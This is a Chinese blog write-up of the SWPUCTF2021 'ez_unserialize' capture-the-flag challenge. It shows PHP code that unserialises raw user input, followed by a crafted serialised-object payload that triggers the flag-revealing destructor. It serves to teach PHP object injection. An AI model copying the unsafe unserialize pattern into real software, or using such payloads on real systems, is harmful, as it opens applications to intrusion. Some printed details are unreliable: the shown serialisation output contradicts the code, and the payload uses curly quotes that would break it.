SWPUCTF2021新生赛_ez_unserialize

#SWPUCTF2021新生赛_ez_unserialize#

(1)题目

 <?php

error_reporting(0);
show_source("cl45s.php");

class wllm{

    public $admin;
    public $passwd;

    public function __construct(){
        $this->admin ="user";
        $this->passwd = "123456";
    }

        public function __destruct(){
        if($this->admin === "admin" && $this->passwd === "ctf"){
            include("flag.php");
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo "Just a bit more!";
        }
    }
}

$p = $_GET['p'];
unserialize($p);

?>

php类的相关知识点:

(2)这道题主要是要通过对p传值来对passwd经行修改,其中传值要通过序列化传值。

 <?php
class wllm{

    public $admin;
    public $passwd;

    public function __construct(){
        $this->admin ="admin";
        $this->passwd = "ctf";
    }

}
$p= new wllm();
echo serialize($p);

?>  
//输出 O:4:"wllm":2:{s:5:"admin";s:4:"user";s:6:"passwd";s:3:"ctf";}

构造payload:?p=O:4:”wllm”:2:{s:5:”admin”;s:5:”admin”;s:6:”passwd”;s:3:”ctf”;}

(3)爆出flag。

打赏
  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!
  • Copyrights © 2021-2023 00hello00

请我喝杯咖啡吧~

支付宝
微信